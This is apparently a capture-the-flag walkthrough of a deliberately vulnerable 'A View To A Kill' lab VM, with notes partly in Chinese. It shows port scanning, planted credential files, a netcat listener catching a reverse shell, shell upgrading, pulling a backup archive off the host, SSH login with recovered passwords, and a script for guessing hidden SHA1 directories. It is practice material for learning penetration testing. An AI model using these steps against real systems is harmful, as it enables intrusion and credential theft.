root@kali:~# nmap -sn -v 192.168.56.0/24 Nmap scan report for 192.168.56.112 Host is up (0.00024s latency). MAC Address: 08:00:27:B0:44:15 (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -p- -sV -Pn -v 192.168.56.112 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 25/tcp open smtp Postfix smtpd 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 8191/tcp open http PHP cli server 5.5 or later
root@kali:~# nmap -sC -v -A -Pn -p 22,25,80,8191 -sV 192.168.56.112 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 54:8e:3a:14:b2:be:03:5c:d4:08:3a:ed:bb:e1:55:53 (RSA) | 256 aa:be:cb:e1:b6:7f:47:75:29:f7:63:e5:f9:39:78:2e (ECDSA) |_ 256 de:1c:31:e0:15:4d:f5:dc:8e:bc:3c:e4:7d:64:75:54 (ED25519) 25/tcp open smtp Postfix smtpd |_smtp-commands: rain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, | ssl-cert: Subject: commonName=rain | Subject Alternative Name: DNS:rain | Issuer: commonName=rain | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2019-07-22T22:11:20 | Not valid after: 2029-07-19T22:11:20 | MD5: 04a9 b97a 8bf2 dc6b 02f2 382b 075b 2e51 |_SHA-1: a4e5 f2f5 efbf 5a3a 215a 9c96 6f9d 10f4 a94e 85bb |_ssl-date: TLS randomness does not represent time 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: HEAD GET POST OPTIONS | http-robots.txt: 4 disallowed entries |_/joomla /zorin /dev /defense |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: A View To A Kill 8191/tcp open http PHP cli server 5.5 or later | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: electronic controller app
Greeting Chuck, We welcome you to the team! Please login to our HR mgmt portal(which we spoke of) and fill out your profile and Details. Make sure to enter in the descrption of your CISSP under Training & Certificate Details since you mentioned you have it. I will be checking that section often as I need to fill out related paperwork. Login username: chuck@localhost.com and password is the lowercase word/txt from the cool R&D video I showed you with the remote detonator + the transmit frequency of an HID proxcard reader - so password format example: facility007. Sorry for the rigmarole, the Security folks will kill me if I send passwords in clear text. We make some really neat tech here at Zorin, glad you joined the team Chuck Lee!
note_to_mail_admins.txt:
1
Yo, wassup computer geeks! I was told by design to upload a few example emails for you nerds to work with in prep for what they called "email web gooey platform".
onboarding_email_template.rtf:
1
Greeting EMPLOYEE, We welcome you to the team! Please login to our HR mgmt portaland fill out your profile and Details. Login username: USERNAME@localhost.com and password is: PASSWORD. INSERT ORG SPECIFIC PHRASE, glad you joined the team EMPLOYEE!
Stop_Storing_Passwords.rtf:
1
All, I know you're close with Max, but you can't keep storing your credentials in txt files on your desktop! We already have had complaints of the apps inactivity auto logout feature, but 5 seconds is high enough in my professional opinion. Simply copy pasting credentials in the login fields is bad practice, even if password requirments are set to 32 characters minimun! - Scarpine - Head of Security - CSO CIO
root@kali:~# nc -lvp 5566 listening on [any] 5566 ... 192.168.56.112: inverse host lookup failed: Host name lookup failure connect to [192.168.56.102] from (UNKNOWN) [192.168.56.112] 55570 Linux view 4.15.0-66-generic #75-Ubuntu SMP Tue Oct 1 05:24:09 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 19:12:10 up 1:23, 0 users, load average: 0.00, 0.02, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ whoami www-data $ pwd / $ python -c 'import pty; pty.spawn("/bin/bash")' www-data@view:/$
在/home/jenny目录下发现一个压缩包,将它下载下来看看里面有什么
1 2 3 4 5 6
www-data@view:/home/jenny$ ls ls dsktp_backup.zip www-data@view:/home/jenny$ python -m SimpleHTTPServer python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ...
passswords.txt:
1 2 3 4 5 6 7
hr mgmt - NO ACCESS ANYMORE jenny@localhost.com ThisisAreallYLONGPAssw0rdWHY!!!!
root@kali:~# ssh jenny@192.168.56.112 Enter passphrase for key '/root/.ssh/id_rsa': jenny@192.168.56.112's password: Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-66-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Jan 23 19:58:43 UTC 2020 System load: 0.0 Processes: 206 Usage of /: 65.0% of 11.75GB Users logged in: 0 Memory usage: 50% IP address for enp0s17: 192.168.56.112 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 181 packages can be updated. 0 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Thu Jan 23 19:42:33 2020 from 192.168.56.102 jenny@view:~$ id uid=1007(jenny) gid=1007(jenny) groups=1007(jenny) jenny@view:~$ whoami jenny
todo.txt:
1 2 3 4 5 6 7 8 9 10 11
TODO
-Give feedback to marketing on logo (it currently looks like the banner ouside a cheap Italian reseaurant!!) -The Boss likes the original, so I guess we're keeping it :/ -Push final script to /home/max/aView.py -Waiting on devs and mechanical eng. to finalize programs (no way for QA to test this one! Yikes!) -Verify James Bond is MI6. They may be on to us. -Security says they are trying to infltrate our servers, so they pushed out a new password policy. -Head of Security said this policy will solve all security related problems after I confronted him about it. -Make a habit of deleting pointless emails. -Migrate needed desktop items to Linux server.
进入max目录下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
www-data@view:/home$ cd max cd max www-data@view:/home/max$ ls ls aView.py note.txt www-data@view:/home/max$ cat note.txt cat note.txt Max,
The electronic controller web application you asked for is almost done. Located on port 8191 this app will allow you to execute your plan from a remote location.
The remote trigger is located in a hidden web directory that only you should know - I verbally confirmed it with you. If you do not recall, the directory is based on an algorithm: SHA1(lowercase alpha(a-z) + "view" + digit(0-9) + digit(0-9)).
prefixes = [bytes([c]) for c in range(ord('a'), ord('z') + 1)] xs = range(10) ys = range(10) suffixes = [bytes(f'{x}{y}', 'ascii') for x in xs for y in ys] names = [prefix + b'view' + suffix + b'\n'for prefix in prefixes for suffix in suffixes] hashes = [sha1(n).hexdigest() for n in names]
